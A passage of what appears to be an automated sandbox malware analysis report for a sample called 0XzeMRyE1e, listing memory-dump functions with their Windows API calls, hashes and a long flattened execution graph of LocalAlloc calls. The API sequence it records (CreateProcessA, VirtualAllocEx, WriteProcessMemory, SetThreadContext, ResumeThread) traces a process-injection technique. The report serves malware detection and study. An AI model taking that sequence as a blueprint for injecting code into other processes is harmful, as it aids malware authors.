                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: fb99cee4de534194f764be4580188a6095f7f16e0a8d6636fc9d27b089122ede
                                                                                • Instruction ID: 73e12ef5d9307b1e4dd32ceeba75c83c57100246dfec2f7348cfb54b2b55e45d
                                                                                • Opcode Fuzzy Hash: fb99cee4de534194f764be4580188a6095f7f16e0a8d6636fc9d27b089122ede
                                                                                • Instruction Fuzzy Hash: B9916A71D00229DFDF10EFA8C881BEDBAB6BF48319F048569D819B7244DB749985CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • [Graph figure not preserved; first node 8927a7a-8927b0d]
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08927CAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: dce1cc5fc70e39d6bff6f3d9cd889c2e753d266b3ad335f42b19a65e091ba59e
                                                                                • Instruction ID: a510d5dc49911a2d5af11d53d150f2e57161edc33ff04b769e03d37e87133f2f
                                                                                • Opcode Fuzzy Hash: dce1cc5fc70e39d6bff6f3d9cd889c2e753d266b3ad335f42b19a65e091ba59e
                                                                                • Instruction Fuzzy Hash: 5A916A71D00229DFDF10EFA8C881BEDBAB6BF48319F048569D819B7244DB349985CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • [Graph figure not preserved; first node c6dc64-c6fd5e]
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C6FE0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 491ebe285d3e7caaa6d45d2737a6ed1844d9cd8e2e9b3e3aeebb2d0ad0353610
                                                                                • Instruction ID: 0bbf8a7309f7e158fc5a64323a109af0bb32dae71a764693ec2200496efeb57e
                                                                                • Opcode Fuzzy Hash: 491ebe285d3e7caaa6d45d2737a6ed1844d9cd8e2e9b3e3aeebb2d0ad0353610
                                                                                • Instruction Fuzzy Hash: C751CFB1D003489FDF14CF99D984ADEBBB5FF48314F24812AE819AB214D775A945CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • [Graph figure not preserved; first node c6fcf3-c6fd5e]
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C6FE0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: c1d62550a173104d98e4e3f62b24d19cd0ba6561109dd1bafe7b1465931959fa
                                                                                • Instruction ID: b74bcccf158450fca8ed0bcf9070057e981a813edc56808b076c23953b3d2afe
                                                                                • Opcode Fuzzy Hash: c1d62550a173104d98e4e3f62b24d19cd0ba6561109dd1bafe7b1465931959fa
                                                                                • Instruction Fuzzy Hash: AC41CDB1D002489FDF14CF99D880ADEBFB5FF88310F24812AE819AB214D7759986CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • [Graph figure not preserved; first node c6536c-c65439]
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00C65429
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: e9ca72b1a85e7b73f1f374a4743ac0a0652e1a37fecf49bd499bce482288cac5
                                                                                • Instruction ID: 80ca090268f4f8e2288ba218fc05ae2e74995758a4d2fc29ecefbb39884306de
                                                                                • Opcode Fuzzy Hash: e9ca72b1a85e7b73f1f374a4743ac0a0652e1a37fecf49bd499bce482288cac5
                                                                                • Instruction Fuzzy Hash: 3B4102B1D0466CCBDF24CF99C884B9DBBB1BF88308F20816AD518BB254DB74694ACF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • [Graph figure not preserved; first node c63e08-c65439]
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00C65429
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: b5f7d9f268660c9884c37f7676505bb11948408dc3fcc43e59f13bc80149f563
                                                                                • Instruction ID: 72427372a378bfebd90993b1f559af482ef8e4618e498171878d6a8111813fe9
                                                                                • Opcode Fuzzy Hash: b5f7d9f268660c9884c37f7676505bb11948408dc3fcc43e59f13bc80149f563
                                                                                • Instruction Fuzzy Hash: E441E2B0D0466CCBDB24CFA9C98479EBBB5BF88308F208169D509AB254DB756945CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • [Graph figure not preserved; first node 6980b98-6980ba4]
                                                                                APIs
                                                                                • SendMessageW.USER32(?,?,?,?), ref: 06980C4D
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.448009727.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_6980000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 43741976f4d780c4e72c761402481200d87e13532c7e1843b36c012549cf1041
                                                                                • Instruction ID: 0c2ae3ca049559bea22a892d063ccafe49f72ef9cf97a34a92c5bfd525f70daf
                                                                                • Opcode Fuzzy Hash: 43741976f4d780c4e72c761402481200d87e13532c7e1843b36c012549cf1041
                                                                                • Instruction Fuzzy Hash: DE2177B1A042489FCB10DFA9D884ADEBFF8EB49324F14846AE449A7751C734A944CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • [Graph figure not preserved; first node c692e0-c692f8]
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C69971,00000800,00000000,00000000), ref: 00C69B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: acc597bd5379cd0df813744952f1bf066329c6dc18a9dcf3a7ff74f1b6eb8331
                                                                                • Instruction ID: fd6688ff0ad07bb694aa65d60ef0e0f07b56117bbc0059565ede36d4faf5d95e
                                                                                • Opcode Fuzzy Hash: acc597bd5379cd0df813744952f1bf066329c6dc18a9dcf3a7ff74f1b6eb8331
                                                                                • Instruction Fuzzy Hash: F8219AB18043988FDB20CF9AC484ADEBBF8EF89310F01845ED465A7211C334A909DFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • [Graph figure not preserved; first node 89288c0-8928916]
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08928958
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 6dc85effee17d9d5d2c309ef2dece9dc48cad75defe6a936e6d94c12d85aae7f
                                                                                • Instruction ID: 8cf93be92d3a4d0d7f0b51638722acfed433b7fb9498dae5c571ce9577bb0f53
                                                                                • Opcode Fuzzy Hash: 6dc85effee17d9d5d2c309ef2dece9dc48cad75defe6a936e6d94c12d85aae7f
                                                                                • Instruction Fuzzy Hash: CD212275900299CFCB00DFA9C984BEEBBF5FF48314F14842AE958A7244D7789944DFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • [Graph figure not preserved; first node 89288c8-8928916]
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08928958
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 0090eae6521deb7ce5108ef9414a03627b36e3a7660b6ab4f09938a4e5c1f778
                                                                                • Instruction ID: 6eb76d857b2eb61c901c743fe8ff1c665f4df8ff852f2bc4dab8035ff305adbb
                                                                                • Opcode Fuzzy Hash: 0090eae6521deb7ce5108ef9414a03627b36e3a7660b6ab4f09938a4e5c1f778
                                                                                • Instruction Fuzzy Hash: 56212FB5900359DFCB00CFA9C980BEEBBF5FB48314F10842AE958A7244D778A944DBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • [Graph figure not preserved; first node c69650-c6b96c]
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C6B89E,?,?,?,?,?), ref: 00C6B95F
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Figure: control-flow graph; legend: executed / not executed. Nodes: c6b8d3-c6b96c (DuplicateHandle), c6b96e-c6b974, c6b975-c6b992]
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C6B89E,?,?,?,?,?), ref: 00C6B95F
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Figure: control-flow graph; legend: executed / not executed. Nodes: 89284a0-89284eb, 89284ed-89284f9, 89284fb-892852b (SetThreadContext), 892852d-8928533, 8928534-8928564]
                                                                                APIs
                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 0892851E
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThread
                                                                                • String ID:
                                                                                • API String ID: 1591575202-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08928761
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08928A7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C69971,00000800,00000000,00000000), ref: 00C69B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08928A7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C69971,00000800,00000000,00000000), ref: 00C69B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00C698F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00C6FF28,?,?,?,?), ref: 00C6FF9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00C698F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00C6FF28,?,?,?,?), ref: 00C6FF9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08928A7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429761380.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c0d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429790666.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c1d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429790666.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c1d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429790666.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c1d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429761380.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c0d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429790666.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c1d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:4.4%
                                                                                Dynamic/Decrypted Code Coverage:93.6%
                                                                                Signature Coverage:9.9%
                                                                                Total number of Nodes:1462
                                                                                Total number of Limit Nodes:43
402bd4 LocalAlloc 36671->36672 36673 401680 36672->36673 36674 402bd4 LocalAlloc 36673->36674 36675 401696 36674->36675 36676 402bd4 LocalAlloc 36675->36676 36677 4016ab 36676->36677 36678 402bd4 LocalAlloc 36677->36678 36679 4016c1 36678->36679 36680 402bd4 LocalAlloc 36679->36680 36681 4016d6 36680->36681 36682 402bd4 LocalAlloc 36681->36682 36683 4016ec 36682->36683 36684 402bd4 LocalAlloc 36683->36684 36685 401702 36684->36685 36686 402bd4 LocalAlloc 36685->36686 36687 401718 36686->36687 36688 402bd4 LocalAlloc 36687->36688 36689 40172e 36688->36689 36690 402bd4 LocalAlloc 36689->36690 36691 401743 36690->36691 36692 402bd4 LocalAlloc 36691->36692 36693 401759 36692->36693 36694 402bd4 LocalAlloc 36693->36694 36695 40176f 36694->36695 36696 402bd4 LocalAlloc 36695->36696 36697 401785 36696->36697 36698 402bd4 LocalAlloc 36697->36698 36699 40179b 36698->36699 36700 402bd4 LocalAlloc 36699->36700 36701 4017b0 36700->36701 36702 402bd4 LocalAlloc 36701->36702 36703 4017c6 36702->36703 36704 402bd4 LocalAlloc 36703->36704 36705 4017db 36704->36705 36706 402bd4 LocalAlloc 36705->36706 36707 4017f1 36706->36707 36708 402bd4 LocalAlloc 36707->36708 36709 401807 36708->36709 36710 402bd4 LocalAlloc 36709->36710 36711 40181d 36710->36711 36712 402bd4 LocalAlloc 36711->36712 36713 401833 36712->36713 36714 402bd4 LocalAlloc 36713->36714 36715 401848 36714->36715 36716 402bd4 LocalAlloc 36715->36716 36717 40185e 36716->36717 36718 402bd4 LocalAlloc 36717->36718 36719 401874 36718->36719 36720 402bd4 LocalAlloc 36719->36720 36721 401889 36720->36721 36722 402bd4 LocalAlloc 36721->36722 36723 40189e 36722->36723 36724 402bd4 LocalAlloc 36723->36724 36725 4018b4 36724->36725 36726 402bd4 LocalAlloc 36725->36726 36727 4018c9 36726->36727 36728 402bd4 LocalAlloc 36727->36728 36729 4018df 36728->36729 36730 402bd4 LocalAlloc 36729->36730 36731 4018f4 36730->36731 36732 402bd4 LocalAlloc 36731->36732 36733 40190a 36732->36733 36734 402bd4 LocalAlloc 36733->36734 36735 401920 
36734->36735 36736 402bd4 LocalAlloc 36735->36736 36737 401935 36736->36737 36738 402bd4 LocalAlloc 36737->36738 36739 40194b 36738->36739 36740 402bd4 LocalAlloc 36739->36740 36741 401961 36740->36741 36742 402bd4 LocalAlloc 36741->36742 36743 401977 36742->36743 36744 402bd4 LocalAlloc 36743->36744 36745 40198c 36744->36745 36746 402bd4 LocalAlloc 36745->36746 36747 4019a2 36746->36747 36748 402bd4 LocalAlloc 36747->36748 36749 4019b7 36748->36749 36750 402bd4 LocalAlloc 36749->36750 36751 4019cc 36750->36751 36752 402bd4 LocalAlloc 36751->36752 36753 4019e1 36752->36753 36754 402bd4 LocalAlloc 36753->36754 36755 4019f7 36754->36755 36756 402bd4 LocalAlloc 36755->36756 36757 401a0d 36756->36757 36758 402bd4 LocalAlloc 36757->36758 36759 401a23 36758->36759 36760 402bd4 LocalAlloc 36759->36760 36761 401a38 36760->36761 36762 402bd4 LocalAlloc 36761->36762 36763 401a4e 36762->36763 36764 402bd4 LocalAlloc 36763->36764 36765 401a63 36764->36765 36766 402bd4 LocalAlloc 36765->36766 36767 401a79 36766->36767 36768 402bd4 LocalAlloc 36767->36768 36769 401a8f 36768->36769 36770 402bd4 LocalAlloc 36769->36770 36771 401aa5 36770->36771 36772 402bd4 LocalAlloc 36771->36772 36773 401aba 36772->36773 36774 402bd4 LocalAlloc 36773->36774 36775 401ad0 36774->36775 36776 402bd4 LocalAlloc 36775->36776 36777 401ae6 36776->36777 36778 402bd4 LocalAlloc 36777->36778 36779 401afc 36778->36779 36780 402bd4 LocalAlloc 36779->36780 36781 401b11 36780->36781 36782 402bd4 LocalAlloc 36781->36782 36783 401b26 36782->36783 36784 402bd4 LocalAlloc 36783->36784 36785 401b3c 36784->36785 36786 402bd4 LocalAlloc 36785->36786 36787 401b52 36786->36787 36788 402bd4 LocalAlloc 36787->36788 36789 401b68 36788->36789 36790 402bd4 LocalAlloc 36789->36790 36791 401b7e 36790->36791 36792 402bd4 LocalAlloc 36791->36792 36793 401b93 36792->36793 36794 402bd4 LocalAlloc 36793->36794 36795 401ba9 36794->36795 36796 402bd4 LocalAlloc 36795->36796 36797 401bbf 36796->36797 36798 402bd4 LocalAlloc 
36797->36798 36799 401bd5 36798->36799 36800 402bd4 LocalAlloc 36799->36800 36801 401beb 36800->36801 36802 402bd4 LocalAlloc 36801->36802 36803 401c01 36802->36803 36804 402bd4 LocalAlloc 36803->36804 36805 401c17 36804->36805 36806 402bd4 LocalAlloc 36805->36806 36807 401c2d 36806->36807 36808 402bd4 LocalAlloc 36807->36808 36809 401c43 36808->36809 36810 402bd4 LocalAlloc 36809->36810 36811 401c59 36810->36811 36812 402bd4 LocalAlloc 36811->36812 36813 401c6f 36812->36813 36814 402bd4 LocalAlloc 36813->36814 36815 401c85 36814->36815 36816 402bd4 LocalAlloc 36815->36816 36817 401c9b 36816->36817 36818 402bd4 LocalAlloc 36817->36818 36819 401cb0 36818->36819 36820 402bd4 LocalAlloc 36819->36820 36821 401cc6 36820->36821 36822 402bd4 LocalAlloc 36821->36822 36823 401cdc 36822->36823 36824 402bd4 LocalAlloc 36823->36824 36825 401cf2 36824->36825 36826 402bd4 LocalAlloc 36825->36826 36827 401d08 36826->36827 36828 402bd4 LocalAlloc 36827->36828 36829 401d1e 36828->36829 36830 402bd4 LocalAlloc 36829->36830 36831 401d33 36830->36831 36832 402bd4 LocalAlloc 36831->36832 36833 401d49 36832->36833 36834 402bd4 LocalAlloc 36833->36834 36835 401d5f 36834->36835 36836 402bd4 LocalAlloc 36835->36836 36837 401d75 36836->36837 36838 402bd4 LocalAlloc 36837->36838 36839 401d8b 36838->36839 36840 402bd4 LocalAlloc 36839->36840 36841 401da1 36840->36841 36842 402bd4 LocalAlloc 36841->36842 36843 401db7 36842->36843 36844 402bd4 LocalAlloc 36843->36844 36845 401dcd 36844->36845 36846 402bd4 LocalAlloc 36845->36846 36847 401de2 36846->36847 36848 402bd4 LocalAlloc 36847->36848 36849 401df7 36848->36849 36850 402bd4 LocalAlloc 36849->36850 36851 401e0d 36850->36851 36852 402bd4 LocalAlloc 36851->36852 36853 401e23 36852->36853 36854 402bd4 LocalAlloc 36853->36854 36855 401e39 36854->36855 36856 402bd4 LocalAlloc 36855->36856 36857 401e4f 36856->36857 36858 402bd4 LocalAlloc 36857->36858 36859 401e65 36858->36859 36860 402bd4 LocalAlloc 36859->36860 36861 401e7a 36860->36861 36862 
